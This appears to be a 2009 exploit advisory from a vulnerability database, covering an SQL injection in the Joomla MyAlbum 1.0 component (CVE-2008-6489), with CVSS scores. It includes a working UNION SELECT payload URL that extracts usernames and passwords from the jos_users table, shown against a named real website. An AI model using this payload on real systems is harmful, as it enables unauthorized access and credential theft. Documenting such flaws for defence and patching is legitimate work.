Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability

2009.03.24
Credit: parad0x
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-6489
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

------------------------------------------------------------------------------------------------- # Title : Joomla Component MyAlbum SQL Injection Vulnerability # Author : parad0x # D.Page : http://joomlacode.org/gf/project/myalbum/ ------------------------------------------------------------------------------------------------- http://[target]/index.php?option=com_myalbum&album=[SQL] ------------------------------------------------------------------------------------------------- Example: http://www.akparti.org.tr/disiliskiler/index.php?option=com_myalbum&album=-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/* ------------------------------------------------------------------------------------------------- greetz : VoLqaN ------------------------------------------------------------------------------------------------- http://inso.host.sk side note: <name>myalbum</name> <creationDate>01.06.2007</creationDate> <author>H&#195;&#188;seyin Bora ABACI</author> <copyright>GNU/GPL</copyright> <authorEmail>borkurt@hotmail.com</authorEmail> <authorUrl>www.joomla.org</authorUrl> <version>1.0</version> <description>MyAlbum is practical,comfortable,fast simple a picture gallery component.</description>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top